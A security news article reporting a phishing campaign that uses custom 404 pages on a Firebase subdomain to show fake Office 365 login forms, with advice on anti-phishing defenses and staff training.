Custom 404 Pages Used to Serve Fake Microsoft Office 365 Login Forms

By Richard Anderson

A new phishing campaign has been detected by security researchers at Microsoft that uses custom 404 pages to display a fake Office 365 login form.

A single domain is used in this campaign and a custom 404 page is created that displays the fake Office 365 login form. The custom 404 page is displayed when any visitor to the website attempts to visit a non-existent web page. Since any URL could be entered to generate the 404 page, the attackers have an endless supply of phishing URLs to use in their campaign.

The landing pages used in this phishing campaign are virtually indistinguishable from genuine Microsoft login pages. All links on the page direct the user to the genuine Microsoft sites to add authenticity. The attackers harvest Office 365 credentials when they are entered into the fake login form. The user is then redirected to a genuine Microsoft site.

The attacker has used a Microsoft-related domain with a free firebase subdomain. Firebase allows a custom 404 page to be set, which will be displayed to all users that attempt to visit an incorrect or broken URL. There are several other ways of creating custom 404 pages, so this campaign could be replicated on other platforms.

Microsoft has already marked the domain as malicious

Microsoft has blacklisted the domain and is blocking phishing emails that link to the domain through its Advanced Threat Protection (APT) offering on Office 365. Google has yet to mark the domain as potentially malicious. When the domain is blacklisted, the attackers will likely switch to another domain and continue the campaign.

To ensure that phishing emails such as this are not delivered to end users’ inboxes, businesses need to implement advanced phishing defenses. That could be Microsoft ATP or a third-party anti-phishing solution on top of Office 365. It is also important to ensure that the workforce is prepared and has been trained how to identify phishing emails and other threats.

Twitter Facebook LinkedIn Reddit Link copied to clipboard

Posted by

Richard Anderson

Richard Anderson is the Editor-in-Chief of NetSec.news